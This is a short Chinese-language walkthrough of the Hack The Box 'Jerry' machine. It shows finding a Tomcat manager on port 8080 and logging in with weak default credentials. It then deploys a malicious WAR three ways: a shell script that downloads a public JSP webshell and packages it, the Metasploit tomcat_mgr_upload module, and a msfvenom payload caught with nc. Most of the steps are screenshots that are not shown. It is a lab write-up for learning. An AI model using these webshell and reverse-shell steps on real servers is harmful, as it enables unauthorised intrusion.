HTB-Jerry

easy box.
首先nmap开路:
HTB-Jerry
文章图片

找到8080端口:
HTB-Jerry
文章图片

Tomcat字典:
https://raw.githubusercontent...
找到弱口令tomcat:s3cret
部署war包:
方法1:
官方walkthrough上的:
HTB-Jerry
文章图片

#!/bin/sh wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp mkdir wshell cp index.jsp wshell/ cd wshell jar -cvf ../wshell.war

部署wshell:
HTB-Jerry
文章图片

路径比较深
HTB-Jerry
文章图片

拿到flag
HTB-Jerry
文章图片

方法2:
msf使用multi/http/tomcat_mgr_upload
HTB-Jerry
文章图片

HTB-Jerry
文章图片

HTB-Jerry
文章图片

HTB-Jerry
文章图片

【HTB-Jerry】方法3:
msfvenom生成war包
HTB-Jerry
文章图片

上传war包后nc:
HTB-Jerry
文章图片

    推荐阅读